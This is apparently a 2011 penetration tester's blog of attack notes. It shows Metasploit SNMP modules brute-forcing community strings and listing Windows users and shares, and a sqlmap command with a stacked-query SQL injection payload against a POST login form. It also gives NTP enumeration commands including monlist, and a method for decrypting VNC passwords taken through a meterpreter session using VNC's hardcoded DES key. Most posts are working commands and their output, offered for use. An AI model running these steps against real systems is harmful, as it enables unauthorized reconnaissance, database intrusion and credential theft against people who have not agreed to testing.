Wednesday, March 23, 2011

New SNMP Metasploit Modules

my new favorite modules (for today) are the snmp_enumusers and snmp_enumshares modules that work against windows hosts that have snmp running.

msf > use auxiliary/scanner/snmp/
use auxiliary/scanner/snmp/aix_version
use auxiliary/scanner/snmp/snmp_enumshares

use auxiliary/scanner/snmp/cisco_config_tftp
use auxiliary/scanner/snmp/snmp_enumusers

use auxiliary/scanner/snmp/cisco_upload_file
use auxiliary/scanner/snmp/snmp_login

use auxiliary/scanner/snmp/snmp_enum
use auxiliary/scanner/snmp/snmp_set


msf > use auxiliary/scanner/snmp/snmp_login
msf auxiliary(snmp_login) > set RHOSTS 192.168.100.119

RHOSTS =>
192.168.100.119
msf auxiliary(snmp_login) > run


[+] SNMP:
192.168.100.119 community string: 'public' info: 'Hardware: x86 Family 6 Model 23 Stepping 6 AT/AT COMPATIBLE - Software: Windows Version 5.2 (Build 3790 Multiprocessor Free)'
[+] SNMP:
192.168.100.119 community string: 'private' info: 'Hardware: x86 Family 6 Model 23 Stepping 6 AT/AT COMPATIBLE - Software: Windows Version 5.2 (Build 3790 Multiprocessor Free)'
[*] Validating scan results from 1 hosts...

[*] Host
192.168.100.119 provides READ-WRITE access with community 'private'
[*] Scanned 1 of 1 hosts (100% complete)

[*] Auxiliary module execution completed


msf auxiliary(snmp_login) > use auxiliary/scanner/snmp/snmp_enumusers
msf auxiliary(snmp_enumusers) > info

...SNIP...

Description:

This module will use LanManager OID values to enumerate local user accounts on a Windows system via SNMP

msf auxiliary(snmp_enumusers) > set RHOSTS
192.168.100.119
RHOSTS =>
192.168.100.119
msf auxiliary(snmp_enumusers) > run


[+]
192.168.100.119 Found Users: ASPNET, Administrator, Guest, IUSR_SRV, IWAM_SRV, SUPPORT_388945a0
[*] Scanned 1 of 1 hosts (100% complete)

[*] Auxiliary module execution completed


msf auxiliary(snmp_enumusers) > use auxiliary/scanner/snmp/snmp_enumshares
msf auxiliary(snmp_enumshares) > info
...SNIP...

Description:
This module will use LanManager OID values to enumerate SMB shares on a Windows system via SNMP

msf auxiliary(snmp_enumshares) > set RHOSTS
192.168.100.119
RHOSTS =>
192.168.100.119
msf auxiliary(snmp_enumshares) > run


[+]
192.168.100.119
backup - (C:\Program Files\Common Files\Microsoft Shared\Web Server Extensions\backup)

MetaInfoBack - (C:\WINDOWS\system32\inetsrv\MetaInfoBack)

NewBackup2 - (J:\NewBackup2)

SharepointBackup - (K:\SharepointBackup)

[*] Scanned 1 of 1 hosts (100% complete)

[*] Auxiliary module execution completed

Monday, March 21, 2011

sqlmap with POST requests

Notes for sqlmap and POST requests since every f**king tutorial only covers GETs

options you'll want to use

-u URL, --url=URL <-- Target url
--method=METHOD <-- HTTP method, GET or POST (default GET)
--data=DATA <-- Data string to be sent through POST
-p TESTPARAMETER <-- Testable parameter(s)
--prefix=PREFIX <-- Injection payload prefix string

--postfix=POSTFIX <-- Injection payload postfix string

--dbms=DBMS <--Force back-end DBMS to this value

*--dbms= if sqlmap is sucking

we'll assume we have a simple post request


user@ubuntu:~/pentest/sqlmap-dev$ python sqlmap.py -u "http://192.168.1.100/fancyshmancy/login.aspx" --method POST --data "usernameTxt=blah&passwordTxt=blah&submitBtn=Log+On" -p "usernameTxt" --prefix="')" --dbms=mssql -v 2

--method to pass the POST option

--data to pass the paramaters that are required for the POST

-p to pass the injectable field, so in this case the username field (usernameTxt)

--prefix to pass what needs to be passed before we can inject. we had to issue a tick ( ' ) and right parenthesis ( ) ) to close out the query

--dbms to tell it the backend was mssql

this yields us an sqlmap query like so:

Place: POST
Parameter: usernameTxt
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: usernameTxt=blah'); WAITFOR DELAY '0:0:5';-- AND ('yTwo'='yTwo&passwordTxt=blah&submitBtn=Log+On
---

Friday, March 18, 2011

I forgot my NTP stuff, so here's more notes on it

yeah what the title says, for some reason the NTP module wasn't working for me in Metasploit so i had to remember how to use the NTP tools to pull some info.

here are my notes:

http://www.eecis.udel.edu/~mills/ntp/html/ntpdc.html
ntpdc -c sysinfo 192.168.1.205
ntpdc -c monolist 192.168.1.205

ntpdc -c listpeers 192.168.1.205

ntpdc -c peers 192.168.1.205

ntpdc -c reslist 192.168.1.205


http://www.eecis.udel.edu/~mills/ntp/html/ntpq.html
ntpq 192.168.1.205
-> version

-> host

-> readlist

-> lpeers

-> hostnames

-> keytype

-> ntpversion

-> associations
-> pstatus [#]

ntpq> help
ntpq commands:

addvars debug lopeers passociations rl

associations delay lpassociations passwd rmvars

authenticate exit lpeers peers rv

cl help mreadlist poll showvars

clearvars host mreadvar pstatus timeout

clocklist hostnames mrl quit version

clockvar keyid mrv raw writelist

cooked keytype ntpversion readlist writevar

cv lassociations opeers readvar

ntpq>

chris@notbt:/pentest$ ntpq 192.168.1.60
ntpq> lpeers

remote refid st t when poll reach delay offset jitter

==============================================================================

*computerville.wxy.suk 192.168.1.108 2 u 338 1024 377 35.327 -0.702 1.030


ntpq> version

ntpq 4.2.4p8@1.1612-o Fri Apr 9 00:28:48 UTC 2010 (1)


ntpq> host

current host is 192.168.1.60


ntpq> readlist

assID=0 status=0658 leap_none, sync_ntp, 5 events, event_8,

version="ntpd 4.2.6p2@1.2194-o Sun Oct 17 02:04:37 UTC 2010 (1)",
processor="x86_64", system="Linux/2.6.35.4-x86_64-linode16", leap=00,strasuk=3, precision=-20, rootdelay=58.612, rootdisp=86.969, refid=1.2.3.102,
reftime=d12a932f.e1697c36 Wed, Mar 16 2011 1:38:55.880,

clock=d12a98c9.eee329a7 Wed, Mar 16 2011 2:02:49.933, peer=18290,

tc=10, mintc=3, offset=-0.702, frequency=-16.787, sys_jitter=1.061, clk_jitter=0.881, clk_wander=0.144


ntpq> hostnames

hostnames being shown



ntpq> keytype

keytype is MD5


ntpq> ntpversion

NTP version being claimed is 2


ntpq> associations


ind assID status conf reach auth condition last_event cnt

===========================================================

1 18290 964a yes yes none sys.peer 4


ntpq> pstatus 18290

assID=18290 status=964a reach, conf, sel_sys.peer, 4 events, event_10,

srcadr=computerville.wxy.suk.de, srcport=123, dstadr=192.168.1.60,

dstport=123, leap=00, strasuk=2, precision=-20, rootdelay=22.964,

rootdisp=33.768, refid=192.168.1.108,
reftime=d12a9360.1f34b00f Wed, Mar 16 2011 1:39:44.121,
rec=d12a976a.e177c84f Wed, Mar 16 2011 1:56:58.880, reach=377,

unreach=0, hmode=3, pmode=4, hpoll=10, ppoll=10, headway=0, flash=00 ok,

keyid=0, offset=-0.702, delay=35.327, dispersion=19.528, jitter=1.030,
xleave=0.050, filtdelay= 35.56 35.33 35.47 35.69 35.81 35.42 35.38 35.58,
filtoffset= -0.85 -0.70 -0.86 -1.42 -1.63 -1.90 -2.42 -1.97,

filtdisp= 0.00 16.25 32.00 47.93 63.45 79.40 95.69 111.96


chris@notbt:/pentest$ ntpdc -c monlist 192.168.1.60

remote address port local address count m ver code avgint lstint
===============================================================================

computerville.wxy.suk.de 123 192.168.1.60 6832 4 4
90 1044 476


chris@notbt:/pentest$ ntpdc -c sysinfo 192.168.1.60

system peer: computerville.wxy.suk.de
system peer mode: client
leap indicator: 00
strasuk: 3
precision: -20
root distance: 0.05861 s
root dispersion: 0.08899 s
reference ID: [1.2.3.102]
reference time: d12a932f.e1697c36 Wed, Mar 16 2011 1:38:55.880
system flags: auth monitor ntp kernel stats
jitter: 0.001053 s
stability: 0.000 ppm
broadcastdelay: 0.000000 s
authdelay: 0.000000 s

chris@notbt:/pentest$ ntpdc -c listpeers 192.168.1.60

client computerville.wxy.suk.de

chris@notbt:/pentest$ ntpdc -c peers 192.168.1.60

remote local st poll reach delay offset disp
=======================================================================
*computerville.wxy.suk 192.168.1.60 2 1024 377 0.03532 -0.000702 0.13974

chris@notbt:/pentest$ ntpdc -c reslist 192.168.1.60

address mask count flags

=====================================================================

0.0.0.0 0.0.0.0 6846 nomodify, nopeer

some-domain 255.255.255.255 0 none

some-domain 255.255.255.255 0 ignore

osafs.org 255.255.255.255 0 ignore

:: :: 0 nomodify, nopeer

ip6-localhost ffff:ffff:ffff: 0 ignore

fe80::fcfd:b2ff ffff:ffff:ffff: 0 ignore

Tuesday, March 15, 2011

VNC passwords and Metasploit and DES

inside your meterpreter shell run getvncpw

meterpreter > run getvncpw
[*] Searching for VNC Passwords in the registry....

[*] FOUND in HKLM\Software\RealVNC\WinVNC4 -=> 3290e903b5bf3769 =>


you're probably asking yourself what the F kind of password 3290e... is. Well its DES encrypted. Lucky for us the key is hardcoded (0x238210763578887) and since VNC is open source...

code here:
http://packetstormsecurity.org/files/view/10159/vncdec.

change the relevant section

/* put your password hash here in p[] */

char p[]={0x59,0x58,0x6e,0x10,0xa4,0x48,0xd3,0x80};


getvncpw spit out: 3290e903b5bf3769

char p[]={0x32,0x90,0xe9,0x03,0xb5,0xbf,0x37,0x69};

cg@segfault:~/pentest$ gcc vncdec.c -o vncdec
cg@segfault:~/pentest$ ./vncdec
demopass


or use this one
http://www.consume.org/~jshare/vncdec.c

where you can just put your hash on the command line and don't have to recompile every time.